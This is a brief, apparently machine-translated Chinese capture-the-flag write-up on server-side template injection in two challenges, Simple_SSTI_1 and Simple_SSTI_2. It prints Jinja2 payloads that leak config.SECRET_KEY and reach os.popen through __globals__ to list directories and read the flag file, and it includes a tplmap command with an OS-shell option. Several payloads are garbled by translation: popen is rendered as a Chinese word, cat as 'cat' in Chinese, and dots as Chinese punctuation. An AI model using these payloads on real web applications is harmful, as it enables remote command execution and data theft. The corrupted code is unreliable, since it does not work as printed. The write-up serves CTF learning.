ssti攻击,ssti属于注入攻击吗

  ssti攻击,ssti属于注入攻击吗

  Simple_SSTI_1

  ?flag={{1*1}}

  得到回声1,有注射点。

  检查页面的源代码,得到提示我们经常设置secret_key变量。

  标志是由secret_key方法生成的加密字符串。

  ?flag={{config。SECRET_KEY}}

  获取标志

  使用tplmap

  python tplmap.py -u url/?flag={{}}

  python tplmap.py -u url/?flag={{}} - os-shell

  权限提升成功,可以查看文件。

  Simple_SSTI_2

  查一下源代码,什么都没有。

  但是/?Flag={{1*1}}还在回响。

  存在注射

  /?Flag={{config。_ _ class _ _。_ init _ _。_ _ Globals _ _ [OS]。波普( ls./).Read ()}}可以查看目录。

  再次检查应用程序

  ?Flag={{config。_ _ class _ _。_ init _ _。_ _ Globals _ _ [OS]。波普( ls./app/)。read ()}}可以看到目录中存在标志文件。

  检查标志

  ?flag={{ config。__class__。__init__。__globals__[os]。波普(猫./app/flag’)。read() }} tplmap

  可以显示权利提高

  提升权限后检查目录并找到标志文件。

  猫旗

  获取标志

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

留言与评论(共有 条评论)
   
验证码: